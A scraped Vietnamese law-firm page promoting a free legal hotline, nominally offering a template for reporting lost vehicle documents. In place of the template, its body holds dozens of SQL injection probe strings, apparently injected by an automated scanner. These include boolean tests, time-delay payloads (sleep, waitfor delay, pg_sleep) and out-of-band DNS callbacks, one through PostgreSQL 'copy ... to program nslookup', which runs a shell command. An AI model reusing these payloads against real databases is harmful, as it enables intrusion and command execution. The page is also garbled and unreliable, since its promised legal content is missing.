Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn báo mất giấy tờ xe

Cập nhật lần cuối lúc 09:43 ngày 16/07/2014

1
1
1
1
-1 OR 2+349-349-1=0+0+0+1 --
-1 OR 3+349-349-1=0+0+0+1 --
1'"
\
-1 OR 3*2<(0+5+349-349) --
1
-1 OR 3*2>(0+5+349-349) --
@@WKvKA
-1 OR 2+854-854-1=0+0+0+1
JyI=
-1 OR 3+854-854-1=0+0+0+1
-1 OR 3*2<(0+5+854-854)
-1 OR 3*2>(0+5+854-854)
-1' OR 2+852-852-1=0+0+0+1 --
-1' OR 3+852-852-1=0+0+0+1 --
-1' OR 3*2<(0+5+852-852) --
-1' OR 3*2>(0+5+852-852) --
-1' OR 2+551-551-1=0+0+0+1 or 'UI8mp0IK'='
-1' OR 3+551-551-1=0+0+0+1 or 'UI8mp0IK'='
-1' OR 3*2<(0+5+551-551) or 'UI8mp0IK'='
-1' OR 3*2>(0+5+551-551) or 'UI8mp0IK'='
-1" OR 2+455-455-1=0+0+0+1 --
-1" OR 3+455-455-1=0+0+0+1 --
-1" OR 3*2<(0+5+455-455) --
-1" OR 3*2>(0+5+455-455) --
if(now()=sysdate(),sleep(3.859),0)/*'XOR(if(now()=sysdate(),sleep(3.859),0))OR'"XOR(if(now()=sysdate(),sleep(3.859),0))OR"*/
(select(0)from(select(sleep(7.718)))v)/*'+(select(0)from(select(sleep(7.718)))v)+'"+(select(0)from(select(sleep(7.718)))v)+"*/
-1; waitfor delay '0:0:11.577' --
-1); waitfor delay '0:0:11.577' --
1 waitfor delay '0:0:11.577' --
4RHdowm4'; waitfor delay '0:0:3.859' --
-1;select pg_sleep(3.859); --
-1);select pg_sleep(7.718); --
-1));select pg_sleep(7.718); --
Ti4N2b3X';select pg_sleep(11.577); --
Fulhr2q0');select pg_sleep(11.577); --
WDoNclQ3'));select pg_sleep(3.859); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5147.34060.0f187.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5148.34060.0f187.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5150.34060.0f187.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5152.34060.0f187.\1.bxss.me
688'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: